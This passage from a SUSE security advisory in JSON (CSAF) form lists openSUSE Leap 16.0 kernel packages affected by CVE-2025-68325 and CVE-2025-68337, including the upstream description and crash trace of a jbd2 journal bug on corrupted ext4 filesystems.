"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
